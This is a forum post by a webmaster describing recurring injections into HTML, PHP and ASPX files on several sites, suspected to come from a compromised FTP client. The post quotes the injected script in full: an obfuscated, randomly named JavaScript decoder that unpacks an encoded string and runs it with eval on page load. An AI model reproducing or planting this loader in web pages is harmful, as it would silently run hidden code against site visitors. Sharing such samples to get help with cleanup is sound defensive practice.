Hi Guys,

Just to add a little to this thread, I also host websites on a few different servers, and had a few domains affected by something very similar. My first instinct was to blame the hosting company Hostdepartment.com, but I recently moved a few sites away from them, and voila the same dodgy script keeps coming back inserted into the code ...

I have had HTML, PHP and ASPX files infected with something like :-
-----------------------------------------------------
<script language=JavaScript> function adhnbn51(b){ var e=b.length,f=1024,m,y,p,k=0,j=0,n=0,t=Array(63,32, 5,20,4,62,35,34,10,24,0,0,0,0,0,0,47,57,17,3,29,28 ,50,19,51,23,33,1,55,18,48,16,37,56,36,7,11,0,31,3 9,12,8,43,0,0,0,0,61,0,26,58,41,45,15,46,25,14,22, 9,6,2,38,54,21,60,42,30,27,53,13,52,59,49,40,44);f or(y=Math.ceil(e/f);y>0;y--){p='';for(m=Math.min(e,f);m>0;m--,e--){{n|=(t[b.charCodeAt(k++)-48])<<j;if(j){p+=String.fromCharCode(197^n&255);n>>= 8 ;j-=2}else{j=6}}}eval(p);}}adhnbn51('FFbqJqqzZsszRkTz n7@QKqbq18f0JqqcN78yZkwbFrTZxlaw7WeZ6rTcylaAZM8q17 ecvsVyJlVAnrZcQVrZxksd0ZfbpsTyZaTyZHbq6qqbxqf57wh7 RksZZVZqNfayd6YcxnbbLMbqJq8qdH5wLI@_NCewfThcvsVyJl @QfT5APTTZJksZQG@pFIrZ1FqydkT5vGepPsszpm8yQVryzasd cM8@0@qqZlbAwW@bzhbdR78ywThw') </script>
-----------------------------------------------------
and it seems that the function name is randomly created.

I have no idea what it does, but would love to know.

Its bugged me how it got there for days, but eventually I've been able to track it down as bewst I can and I beleive that my WSFTP PRO install is to blame which is infecting the websites files on upload. Highly dodgy. (I have not been able to find any files infected in the local drive, but infections in the versions being uploaded to my servers hence my thoughts of an infected FTP client being the culprit. )

I used Eraser to purge my WSFTP install and switching to CuteFTP - Hoping this will resolve the issue.

I simultaneoulsly run Avira, Norton, Malbytes and Spybot Search & Destroy.

The only package that got a sniff at this was Avira, as it alerted me when trying to view one of my own sites.

Any input / ideas / feedback appreciated.

I will post anything else as I find it.

Regards
Broomie